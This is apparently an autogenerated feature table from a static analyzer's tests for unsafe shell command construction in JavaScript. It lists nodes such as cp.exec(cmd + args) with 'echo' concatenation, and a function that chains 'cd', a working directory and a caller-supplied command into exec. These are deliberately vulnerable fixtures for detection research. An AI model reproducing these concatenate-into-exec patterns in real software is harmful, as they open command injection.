autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:20 | exceptional return of cp.exec(cmd + args) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:5:485:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:5:485:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:5:485:8 | exec | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:5:485:8 | exec | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:5:485:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:12 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:12 | cmd | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:12 | cmd | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:12 | cmd | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:12 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:12 | cmd | stringConcatenatedWith | -endpoint- args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:19 | cmd + args | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:19 | cmd + args | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:19 | cmd + args | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:19 | cmd + args | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:19 | cmd + args | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:19 | cmd + args | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:19 | cmd + args | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:19 | cmd + args | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:10:485:19 | cmd + args | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:16:485:19 | args | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:16:485:19 | args | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:16:485:19 | args | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:16:485:19 | args | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:16:485:19 | args | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:16:485:19 | args | stringConcatenatedWith | 'echo' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:1:488:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:1:488:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:1:488:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:1:488:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:1:488:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:1:488:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:1:488:24 | module. ... Command | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:1:488:24 | module. ... Command | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:1:488:24 | module. ... Command | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:1:501:2 | module. ... K\\n\\t}\\n}) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:1:501:2 | module. ... K\\n\\t}\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:1:501:2 | module. ... K\\n\\t}\\n}) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:8:488:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:8:488:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:8:488:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:16:488:24 | myCommand | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:16:488:24 | myCommand | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:16:488:24 | myCommand | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:488:27 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:488:27 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:488:27 | cp | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:488:27 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:488:27 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:488:27 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:488:27 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:488:27 | this | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:488:27 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:488:27 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | 'arguments' object of anonymous function | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | exceptional return of anonymous function | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | functio ... cmd);\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | functio ... cmd);\\n} | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | functio ... cmd);\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:488:28:491:1 | return of anonymous function | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| 